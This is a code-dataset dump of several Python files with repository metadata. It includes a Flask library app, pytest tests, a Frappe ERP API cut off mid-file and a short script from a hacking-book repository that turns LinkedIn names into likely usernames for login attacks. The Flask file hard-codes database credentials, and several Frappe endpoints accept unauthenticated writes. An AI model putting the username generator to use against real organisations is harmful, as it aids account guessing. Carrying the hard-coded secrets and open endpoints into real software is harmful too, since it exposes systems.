hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
8209e6f9baf6dc11c2faf5266f9168821f205e98
2,243
py
Python
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
null
null
null
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
null
null
null
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
3
2018-02-09T02:46:48.000Z
2021-02-20T08:32:03.000Z
# DRUNKWATER TEMPLATE(add description and prototypes) # Question Title and Description on leetcode.com # Function Declaration and Function Prototypes on leetcode.com #731. My Calendar II #Implement a MyCalendarTwo class to store your events. A new event can be added if adding the event will not cause a triple booking. #Your class will have one method, book(int start, int end). Formally, this represents a booking on the half open interval [start, end), the range of real numbers x such that start <= x < end. #A triple booking happens when three events have some non-empty intersection (ie., there is some time that is common to all 3 events.) #For each call to the method MyCalendar.book, return true if the event can be added to the calendar successfully without causing a triple booking. Otherwise, return false and do not add the event to the calendar. #Your class will be called like this: MyCalendar cal = new MyCalendar(); MyCalendar.book(start, end) #Example 1: #MyCalendar(); #MyCalendar.book(10, 20); // returns true #MyCalendar.book(50, 60); // returns true #MyCalendar.book(10, 40); // returns true #MyCalendar.book(5, 15); // returns false #MyCalendar.book(5, 10); // returns true #MyCalendar.book(25, 55); // returns true #Explanation: #The first two events can be booked. The third event can be double booked. #The fourth event (5, 15) can't be booked, because it would result in a triple booking. #The fifth event (5, 10) can be booked, as it does not use time 10 which is already double booked. #The sixth event (25, 55) can be booked, as the time in [25, 40) will be double booked with the third event; #the time [40, 50) will be single booked, and the time [50, 55) will be double booked with the second event. #Note: #The number of calls to MyCalendar.book per test case will be at most 1000. #In calls to MyCalendar.book(start, end), start and end are integers in the range [0, 10^9]. #class MyCalendarTwo(object): # def __init__(self): # def book(self, start, end): # """ # :type start: int # :type end: int # :rtype: bool # """ ## Your MyCalendarTwo object will be instantiated and called as such: ## obj = MyCalendarTwo() ## param_1 = obj.book(start,end) # Time Is Money
54.707317
212
0.728043
367
2,243
4.435967
0.39782
0.085995
0.034398
0.061425
0.030713
0.030713
0
0
0
0
0
0.03268
0.181453
2,243
41
213
54.707317
0.854031
0.963442
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
820b086050ad75315e1b8b3a7bb8f87684d23be9
173
py
Python
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
1
2021-09-07T14:13:35.000Z
2021-09-07T14:13:35.000Z
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
null
null
null
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
null
null
null
import myPkgs.Scraper # scraping data and save pickle scraper=myPkgs.Scraper.Scraper() scraper.setSubscriptionsPage() scraper.getInfoFromSubScriptions() # create mailHtml
19.222222
34
0.82659
18
173
7.944444
0.666667
0.181818
0
0
0
0
0
0
0
0
0
0
0.092486
173
9
35
19.222222
0.910828
0.260116
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
820ca3e67bffef370d9d41988b414444b2ad1bf8
2,968
py
Python
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
29
2019-12-28T10:37:16.000Z
2022-02-09T10:48:04.000Z
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
29
2019-12-26T13:46:11.000Z
2022-03-29T18:14:33.000Z
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
17
2019-12-29T11:49:32.000Z
2022-02-23T00:28:18.000Z
#!/usr/bin/env python ### # Copyright (c) 2002-2007 Systems in Motion # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # ### # This is an example from the Inventor Mentor, # chapter 5, example 6. # # This example shows the effect of different order of # operation of transforms. The left object is first # scaled, then rotated, and finally translated to the left. # The right object is first rotated, then scaled, and finally # translated to the right. # import sys from pivy.coin import * from pivy.sogui import * def main(): # Initialize Inventor and Qt myWindow = SoGui.init(sys.argv[0]) if myWindow == None: sys.exit(1) root = SoSeparator() # Create two separators, for left and right objects. leftSep = SoSeparator() rightSep = SoSeparator() root.addChild(leftSep) root.addChild(rightSep) # Create the transformation nodes leftTranslation = SoTranslation() rightTranslation = SoTranslation() myRotation = SoRotationXYZ() myScale = SoScale() # Fill in the values leftTranslation.translation = (-1.0, 0.0, 0.0) rightTranslation.translation = (1.0, 0.0, 0.0) myRotation.angle = M_PI/2 # 90 degrees myRotation.axis = SoRotationXYZ.X myScale.scaleFactor = (2., 1., 3.) # Add transforms to the scene. leftSep.addChild(leftTranslation) # left graph leftSep.addChild(myRotation) # then rotated leftSep.addChild(myScale) # first scaled rightSep.addChild(rightTranslation) # right graph rightSep.addChild(myScale) # then scaled rightSep.addChild(myRotation) # first rotated # Read an object from file. (as in example 4.2.Lights) myInput = SoInput() if not myInput.openFile("temple.iv"): sys.exit(1) fileContents = SoDB.readAll(myInput) if fileContents == None: sys.exit(1) # Add an instance of the object under each separator. leftSep.addChild(fileContents) rightSep.addChild(fileContents) # Construct a renderArea and display the scene. myViewer = SoGuiExaminerViewer(myWindow) myViewer.setSceneGraph(root) myViewer.setTitle("Transform Ordering") myViewer.show() myViewer.viewAll() SoGui.show(myWindow) SoGui.mainLoop() if __name__ == "__main__": main()
31.242105
74
0.705863
382
2,968
5.460733
0.465969
0.00767
0.008629
0.00767
0.040268
0.016299
0.016299
0
0
0
0
0.014524
0.211253
2,968
94
75
31.574468
0.876548
0.493598
0
0.046512
0
0
0.024005
0
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.093023
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820ceb9164fe0c747e5f68b273d1654107a1cd1d
1,796
py
Python
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
import os import json import pytest from object_storage import DB DB_FILE_NAME = "db.json" def _create_test_db(): return DB("test", file_name=DB_FILE_NAME) def _create_mock_obj(): return { "programing_languages_features": { "python": ["simple", "easy setup"], "javascript": ["widespread usage", "powerfull"], } } class TestAtributes(object): def test_db_have_name(self): new_db = _create_test_db() assert new_db.name == "test" def test_insert_retrieve_objects(self): new_db = _create_test_db() new_db.insert(key="topic", value="registration") assert new_db.get("topic") == "registration" color_list = ["blue", "red", "green"] new_db.insert("color_list", color_list) assert new_db.get("color_list") == color_list new_db.insert("number", 9) assert new_db.get("number") == 9 obj = _create_mock_obj() new_db.insert("languages", obj) assert new_db.get("languages") == obj def test_db_saves_to_file(self): new_db = _create_test_db() obj = _create_mock_obj() new_db.insert("languages", obj) new_db.save() assert os.stat("db.json") is not None def test_db_saves_proper_data_to_file(self): new_db = _create_test_db() obj = _create_mock_obj() new_db.insert("languages", obj) new_db.save() with open(DB_FILE_NAME, "r") as f: loaded_obj = json.load(f) assert loaded_obj == new_db.objects def test_db_loads_from_file(self): new_db = _create_test_db() new_db.insert("number", 1) new_db.save() loaded_db = DB("test", DB_FILE_NAME, True) assert loaded_db.objects == {"number": 1}
26.80597
60
0.614143
244
1,796
4.143443
0.27459
0.103858
0.076162
0.074184
0.274975
0.274975
0.254204
0.250247
0.250247
0.148368
0
0.003019
0.262249
1,796
67
61
26.80597
0.76
0
0
0.28
0
0
0.132999
0.016138
0
0
0
0
0.16
1
0.14
false
0
0.08
0.04
0.28
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820f6292ce69f024eb8b287f0493082d26ff31c3
3,898
py
Python
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
from flask import Flask, flash, render_template, request, redirect, url_for from flask_sqlalchemy import SQLAlchemy from flask_wtf import FlaskForm from wtforms import StringField, SubmitField class Config(object): SQLALCHEMY_DATABASE_URI = "mysql://root:chuanzhi@127.0.0.1:3306/library" SQLALCHEMY_TRACK_MODIFICATIONS = False SECRET_KEY = "a13uo1ccl" class Register(FlaskForm): author = StringField("作者", render_kw={"placeholder": "添加作者"}) book = StringField("书名", render_kw={"placeholder": "添加书名"}) submit = SubmitField("添加") app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) class Author(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(15), nullable=False) books = db.relation("Book", backref="author") def __repr__(self): return "Author: {} {}".format(self.name, self.id) class Book(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(30), nullable=False) author_id = db.Column(db.Integer, db.ForeignKey(Author.id)) def __repr__(self): return "Book: {} {}".format(self.name, self.id) @app.route('/', methods=['GET', 'POST']) def index(): form = Register() if request.method == "POST": if form.validate_on_submit(): author_name = request.form.get("author") book_name = request.form.get("book") author = Author.query.filter(Author.name == author_name).first() if author: # 有作者只添加书籍 book = Book.query.filter(Book.name == book_name).first() if book: flash("已经有此书了,请勿重复添加") else: new_book = Book(name=book_name, author_id=author.id) db.session.add(new_book) db.session.commit() else: # 没有该作者,添加作者再添加书籍 new_author = Author(name=author_name) db.session.add(new_author) db.session.commit() new_book = Book(name=book_name, author_id=new_author.id) db.session.add(new_book) db.session.commit() else: flash("参数错误") authors = Author.query.all() return render_template("temp4_72.html", form=form, authors=authors) @app.route('/del_book/<book_id>') def del_book(book_id): delbook = Book.query.get(book_id) if delbook: try: db.session.delete(delbook) except Exception as e: flash(e) db.session.rollback() finally: db.session.commit() else: flash("书名不存在。。。") return redirect(url_for("index")) @app.route('/del_author/<author_id>') def del_author(author_id): delauthor = Author.query.get(author_id) if delauthor: # 删除作者需要先删除旗下所有书籍 books = Book.query.filter(author_id == Book.author_id) try: for book in books: db.session.delete(book) db.session.delete(delauthor) except Exception as e: flash(e) db.session.rollback() finally: db.session.commit() else: flash("作者不存在。。。") return redirect(url_for("index")) if __name__ == "__main__": db.drop_all() # 创建所有表 db.create_all() # 生成数据 au1 = Author(name='老王') au2 = Author(name='老尹') au3 = Author(name='老刘') # 把数据提交给用户会话 db.session.add_all([au1, au2, au3]) db.session.commit() bk1 = Book(name='老王回忆录', author_id=au1.id) bk2 = Book(name='我读书少,你别骗我', author_id=au1.id) bk3 = Book(name='如何才能让自己更骚', author_id=au2.id) bk4 = Book(name='怎样征服美丽少女', author_id=au3.id) bk5 = Book(name='如何征服英俊少男', author_id=au3.id) # 把数据提交给用户会话 db.session.add_all([bk1, bk2, bk3, bk4, bk5]) # 提交会话 db.session.commit() app.run(debug=True)
29.755725
76
0.596203
484
3,898
4.640496
0.285124
0.068121
0.04675
0.033838
0.259127
0.186109
0.186109
0.186109
0.158504
0.158504
0
0.014371
0.268086
3,898
130
77
29.984615
0.772871
0.02001
0
0.29703
0
0
0.07767
0.017581
0
0
0
0
0
1
0.049505
false
0
0.039604
0.019802
0.29703
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820fc8eb5d725ac75d1fc9754e8b1b1fc09bf771
404
py
Python
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
5
2020-06-12T23:08:28.000Z
2021-09-09T09:18:41.000Z
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
1
2020-02-08T20:07:09.000Z
2020-02-08T20:07:09.000Z
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
null
null
null
import pycats.instances # noqa: F401 def test_semigroup(): a = {1, 2} b = {2, 4} actual = a.combine(b) expected = {1, 2, 4} assert actual == expected def test_monoid(): actual = list.unit() expected = list() assert actual == expected def test_functor(): a = {1, 2, 3} actual = a.map(lambda x: x + 2) expected = {3, 4, 5} assert actual == expected
16.16
37
0.561881
57
404
3.929825
0.45614
0.09375
0.267857
0.205357
0.241071
0
0
0
0
0
0
0.059649
0.294554
404
24
38
16.833333
0.726316
0.024752
0
0.1875
0
0
0
0
0
0
0
0
0.1875
1
0.1875
false
0
0.0625
0
0.25
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8210337a295e13c410889ae84e0363248842ff40
582
py
Python
Chapter04/name2ldap.py
PacktPublishing/Becming-the-Hacker
90eb5bc093d4b6a4b171e1d4cb0170bc23746846
[ "MIT" ]
27
2019-02-13T16:28:44.000Z
2021-12-16T09:53:36.000Z
Chapter04/name2ldap.py
mirroR72/Becoming-the-Hacker
57093174a107f5ea3abc35bcd3d8267f9448afbb
[ "MIT" ]
1
2019-09-14T18:15:02.000Z
2019-09-14T18:15:02.000Z
Chapter04/name2ldap.py
mirroR72/Becoming-the-Hacker
57093174a107f5ea3abc35bcd3d8267f9448afbb
[ "MIT" ]
17
2019-01-31T10:46:09.000Z
2021-12-16T23:37:27.000Z
with open("linkedin.txt", "r") as fp: for name in iter(fp): first, last = name.strip().lower().split(" ") print first + "." + last # david.lightman print first + last # davidlightman fl = first[0] + last lf = last + first[0] print fl # dlightman print lf # lightmand print fl[:8] # dlightma print fl[:7] + "2" # dlightm2 print fl[:7] + "3" # dlightm2 print lf[:8] # davidlig print lf[:7] + "2" # davidli2 print lf[:7] + "3" # davidli3
30.631579
54
0.475945
69
582
4.014493
0.492754
0.101083
0.101083
0
0
0
0
0
0
0
0
0.044818
0.386598
582
18
55
32.333333
0.731092
0.175258
0
0
0
0
0.042129
0
0
0
0
0
0
0
null
null
0
0
null
null
0.666667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
8211154aa4a5a84d14ec8e9f4d95147e8b41f6f1
3,038
py
Python
scripts/write_to_influxdb.py
sync-or-swim/sos-journaler
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
null
null
null
scripts/write_to_influxdb.py
sync-or-swim/sos-journaler
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
27
2020-01-29T05:50:52.000Z
2020-12-20T04:53:01.000Z
scripts/write_to_influxdb.py
BryceBeagle/sync-or-swim
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
null
null
null
from argparse import ArgumentParser from influxdb import InfluxDBClient import datetime import geohash def main(): parser = ArgumentParser( description="Writes some example FIXM data to InfluxDB") parser.add_argument("--hostname", type=str, default="localhost", help="The hostname of InfluxDB") parser.add_argument("--port", type=int, default=8086, help="The port to connect to InfluxDB on") parser.add_argument("--username", type=str, default="root", help="The username to authenticate with InfluxDB") parser.add_argument("--password", type=str, default="root", help="The password to authenticate with InfluxDB") parser.add_argument("--database", type=str, default="fixm", help="The name of the database to write to") args = parser.parse_args() client = InfluxDBClient(args.hostname, args.port, args.username, args.password, args.database) client.create_database(args.database) latitude = 33.626675 longitude = -112.1024746 current_time = datetime.datetime.now() for i in range(10): # Generate a Geohash given the coordinates of the aircraft. A geohash # allows us to do a "fuzzy search" of all aircraft within the same # grid cell. As the geohash precision increases, the size of the grid # cells become smaller. I chose 4 here because that allows for a # precision of +/- 20 km. That's the closest precision we can get to # 9 km, which I think is the closest airplanes are allowed to fly to # each other based on a quick search. ghash = geohash.encode(latitude, longitude, precision=4) # A point is a single row of data in a measurement points = [ { # The measurement is analogous to a table in SQL. It's the # type of data we're writing. "measurement": "location", # Tags are fields of the point that are indexed. They're the # data we expect to look points up by. "tags": { "centre": "ZLA", "flight_number": "N1220W", "geohash": ghash, }, # Time is the time that this point was recorded at "time": current_time.isoformat(), # Fields are like SQL fields, but unlike tags they are not # indexed. This is where the real meat and potatoes of data # goes. "fields": { "latitude": latitude, "longitude": longitude, }, }, ] client.write_points(points) latitude += 0.01 current_time += datetime.timedelta(0, 1) result = client.query("SELECT * FROM location") print(f"Result: {result}") if __name__ == "__main__": main()
38.455696
77
0.571099
355
3,038
4.830986
0.442254
0.026239
0.049563
0.058309
0.0793
0.0793
0.050146
0
0
0
0
0.019057
0.343647
3,038
78
78
38.948718
0.841023
0.274194
0
0
0
0
0.190585
0
0
0
0
0
0
1
0.020408
false
0.061224
0.081633
0
0.102041
0.020408
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8211444c1809530cc0c344f0e30b5c1c9a1ff78e
24,908
py
Python
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals import frappe import json from frappe import _ from frappe.utils import get_fullname, get_link_to_form, get_url_to_form from datetime import date,datetime,timedelta import jwt import time @frappe.whitelist() def inventario(item_code): inventario = frappe.get_all('Bin', filters={'item_code': item_code}, fields=['warehouse', 'actual_qty'] ) frappe.errprint(inventario) return(inventario) @frappe.whitelist() def pings(): return 'pong' def pingo(): return 'pongo' # RG - Actualizar el campo de atrasado y factura en c/customer # 1 - Al finalizar un Payment Entry se actualizaran todos los customers...Iniciamos calculando la fecha de update_atrasado # 2 - Bloquear (congelado = 1, credit_limit = 1) a los mayores de 40 dias y desbloquear (congelado = 0, credit_limit = ) en < 40 # 3 - Si no existe SINV == "Unpaid" o "Overdue" mandar atrasado = 0 @frappe.whitelist() def update_atrasado(): clientes = frappe.db.get_list('Customer',fields=['name']) for c in clientes: facturas = frappe.db.get_list('Sales Invoice', filters={ 'outstanding_amount': ['>', 1],'customer': c.name,'clave':['like', '%%CC%%'] }, fields=['name', 'outstanding_amount','posting_date'], order_by='posting_date asc', page_length=1, as_list=True ) if facturas: today = date.today() someday = facturas[0][2] diff = today - someday #frappe.errprint(diff.days) #frappe.errprint(facturas[0][0]) #frappe.errprint(c.name) if diff.days > 40: frappe.db.sql("UPDATE tabCustomer set congelado = 1 ,credit_limit = 1 WHERE name = %s", (c.name)) frappe.errprint(c.name) frappe.db.sql("UPDATE `tabSales Invoice` a left join tabCustomer b on a.customer = b.customer_name set congelado = 1, credit_limit = 1, b.atrasado = %s, b.factura = %s WHERE b.name = %s", (diff.days,facturas[0][0],c.name)) frappe.db.commit() #else: # frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name)) # frappe.db.commit() return # @ frappe.whitelist () # def ubicacion (): # items = frappe.db.get_list ('Item', fields =['name', 'rack', 'ubicacion']) # for c in items: # ajustes = frappe.db.get_list ('Stock Reconciliation Item', fields =['name','item_code', 'anaquel', 'ubicacion'], order_by = 'creation desc') # for a in ajustes: # if c.ubicacion != a.rack: # #frappe.errprint(c.name) # frappe.errprint(a.anaquel) # frappe.db.commit() # #else /* : */ # # frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name)) # # frappe.db.commit() # return # # @frappe.whitelist() # def ruta(login_manager): # ruta = frappe.db.get_value("User", login_manager.user,"ruta_login") # frappe.errprint(ruta) # frappe.local.response["home_page"] = ruta # {"type":"Feature","properties":{},"geometry":{"type":"LineString","coordinates":[ [-118.383197,32.649782],[-115.382042,32.650772],[-115.380479,32.649689] ] }}]}" @frappe.whitelist(allow_guest=True) # carga los registros de ruta, filtra por usuario y fecha y envia feature collection al front def get_rutas(user,date): rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','creation','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' ) frappe.errprint(rutas) feature = """ { "type": "FeatureCollection" , "features":[ { "type" : "Feature","properties":{},"geometry":{"type":"LineString","coordinates": [ """ for i in rutas: feature += """ [ """ + str(i.lng) + """,""" + str(i.lat) + """ ] """ if i == rutas[-1]: feature += """ ]}}]}""" else: feature += """ , """ return feature @frappe.whitelist(allow_guest=True) # regresa la ruta para las tablas def get_tabla(user,date): rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','time','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' ) return rutas @frappe.whitelist(allow_guest=True) # regresa los usuarios con el Role Profile de Vendedor para iniciar la captura en el app def get_usuarios(): # u = frappe.db.sql("SELECT name from tabUser") # return u usuarios = frappe.get_all('User', fields=['name','full_name'], filters = {'role_profile_name': 'Vendedor'} , order_by='name' ) if usuarios: return usuarios else: return('No encontrado') @frappe.whitelist(allow_guest=True) def generar_lead(owner,lead_name,email_id,numero,lead_owner,source,campaign_name,informacion_adicional,lead_type): doc = frappe.get_doc({ "doctype": "Lead", "user": "Administrator", "owner": owner, "lead_name": lead_name, "email_id": email_id, "numero": numero, "lead_owner": lead_owner, "source": source, "campaign_name": campaign_name, "informacion_adicional": informacion_adicional, "lead_type": lead_type }) doc.insert(ignore_permissions=True) frappe.db.commit() # return('Nuevo Lead: ' + str(doc.name)) # frappe.db.sql("UPDATE tabLead SET status='Asignado' WHERE source like '%Publicidad%'") # frappe.db.commit() frappe.sendmail(['egarcia@totall.mx',"{0}".format(doc.lead_owner)], \ subject=doc.name , \ content="Felicidades usted tiene un nuevo prospecto, de click en la liga para darle seguimiento. ¡Exito! "+frappe.utils.get_url_to_form(doc.doctype, doc.name),delayed=False) @frappe.whitelist(allow_guest=True) def recorrido(user,lat,lng): frappe.log_error(title="Error latitud", message=lat + user) doc = frappe.get_doc({ "doctype": "Recorrido", "user": user.strip('"'), "lng": lng, "lat": lat, "phone": user }) doc.insert(ignore_permissions=True) frappe.db.commit() return('Nueva-Lectura Insertada: ' + str(doc.name)) @frappe.whitelist(allow_guest=True) # carga las estaciones registradas y genera el archivo para el mapa def get_estaciones(): estaciones = frappe.get_all('Estacion', fields=['nombre','lat','lng']) feature = """ { "type": "FeatureCollection" , "features":[ """ for i in estaciones: feature += """ { "type" : "Feature","properties":{"name": " """ + i.nombre + """ "},"geometry":{"type":"Point","coordinates":[""" + str(i.lat) + """,""" + str(i.lng) + """]}}""" if i == estaciones[-1]: feature += """ ]} """ else: feature += """ , """ return feature @frappe.whitelist(allow_guest=True) def estaciones(estacion,lat,lng): est = frappe.db.get_value("Estacion", estacion , "name") if est: frappe.db.sql("UPDATE tabEstacion SET lat=%s , lng= %s WHERE nombre = %s", (lat,lng,estacion)) frappe.db.commit() return ('Estacion Actualizada.') else: return('no se encontro la estacion') # est = frappe.db.get_value("Estacion", estacion , "name") # if est: # frappe.db.set_value("Estacion", estacion, 'lat', lat) # frappe.db.set_value("Estacion", estacion , 'lng', lng) # return ('Estacion Actualizada.') # else: # return('no se encontro la estacion') # RG-Actualizar actual cantidad en Item # falta hacer metodo 